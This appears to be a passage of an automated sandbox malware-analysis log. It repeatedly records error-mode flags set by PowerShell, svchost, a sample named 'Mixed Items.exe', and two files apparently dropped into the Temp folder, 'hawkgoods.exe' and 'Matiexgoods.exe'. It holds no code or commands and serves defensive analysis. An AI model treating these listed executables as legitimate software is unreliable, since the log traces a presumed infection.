                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
